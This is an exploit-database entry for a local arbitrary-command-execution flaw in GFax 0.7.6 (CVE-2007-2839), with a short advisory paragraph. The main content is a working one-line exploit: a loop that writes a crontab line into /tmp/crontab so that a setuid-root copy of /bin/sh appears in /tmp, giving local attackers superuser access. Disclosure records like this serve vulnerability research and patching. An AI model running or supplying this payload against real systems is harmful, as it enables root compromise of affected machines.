GFax 0.7.6 - Temporary Files Local Arbitrary Command Execution
| EKU-ID: 35367 | CVE: CVE-2007-2839;OSVDB-37883 | OSVDB-ID: |
| Author: Steve Kemp | Published: 2007-07-05 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 35367 | CVE: CVE-2007-2839;OSVDB-37883 | OSVDB-ID: |
| Author: Steve Kemp | Published: 2007-07-05 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/24780/info GFAX is prone to a vulnerability that lets local attackers execute arbitrary commands with superuser privileges. Successful attacks will result in the complete compromise of affected computers. GFAX 0.7.6 is vulnerable; other versions may also be affected. while true; do echo "*/1 * * * * root /bin/cp /bin/sh /tmp && chmod 4755 /tmp/sh" > /tmp/crontab; done